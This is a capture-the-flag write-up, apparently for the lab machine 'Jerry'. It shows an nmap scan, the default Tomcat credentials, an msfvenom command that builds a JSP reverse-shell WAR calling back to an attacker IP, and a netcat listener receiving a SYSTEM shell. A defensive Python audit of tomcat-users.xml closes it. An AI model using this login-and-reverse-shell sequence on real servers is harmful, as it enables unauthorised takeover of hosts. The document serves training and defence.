# Jerry

`apache tomcat`

* Machine name: Jerry
* Difficulty: Easy
* OS: Windows

## Enumeration

### NMAP

```
Nmap scan report for 10.10.10.95
Host is up, received user-set (0.031s latency).
Scanned at 2024-11-04 09:38:29 EST for 1029s
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE    REASON
8080/tcp open  http-proxy syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1028.55 seconds
```

### HTTP (8080): Apache Tomcat

Credentials: `tomcat:s3cret`

## Initial access

```
┌──(kali㉿kali)-[~]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.12 LPORT=1234 -f war -o revshell.war
Payload size: 1084 bytes
Final size of war file: 1084 bytes
Saved as: revshell.war
```

WAR file to deploy --> browse ...

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FbMAMK5EH531K35g8SPOX%2Ff32f4e6c7879a8b5175fd536d7ab32d5.png?alt=media&#x26;token=58990f7f-adfc-403d-b62f-3c09c7aff43a" alt=""><figcaption></figcaption></figure>

/revshell

```
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 1234                    
listening on [any] 1234 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
```
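
The foothold above depends on the `tomcat:s3cret` login being accepted with rights to deploy a WAR. As an added example (not part of the original notes), here is a defender-side audit of `tomcat-users.xml` that flags accounts holding a deploy-capable Manager role with a default or guessable password. The sample file, the accounts other than `tomcat`, and the short weak-password list are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Manager roles that allow deploying a WAR (HTML GUI and text interface).
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Constructed short list; "s3cret" is the password seen in these notes.
WEAK_PASSWORDS = {"", "s3cret", "tomcat", "admin", "password", "changeit"}

# Constructed sample of a conf/tomcat-users.xml file.
SAMPLE = """<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="manager-status"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="ci" password="ci" roles="manager-script"/>
  <user username="deployer" password="R7v-long-random-value" roles="manager-script"/>
  <user username="monitor" password="tomcat" roles="manager-status"/>
</tomcat-users>
"""

def local(tag):
    """Strip an XML namespace, which newer tomcat-users.xml files declare."""
    return tag.rsplit("}", 1)[-1]

def audit_tomcat_users(xml_text):
    """Return (username, deploy_roles, reason) for each risky account."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local(el.tag) != "user":
            continue
        name = el.get("username") or el.get("name") or ""
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        deploy = sorted(roles & DEPLOY_ROLES)
        if not deploy:
            continue  # account cannot deploy applications
        if password.lower() in WEAK_PASSWORDS:
            reason = "default or weak password"
        elif password.lower() == name.lower():
            reason = "password equals username"
        else:
            continue
        findings.append((name, deploy, reason))
    return findings

if __name__ == "__main__":
    for name, roles, reason in audit_tomcat_users(SAMPLE):
        print(f"{name}: {reason}; can deploy WARs via {', '.join(roles)}")
```

The shell above came back as `nt authority\system`, so any account this audit flags should be treated as equivalent to full control of the host while the Tomcat service runs under that identity.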
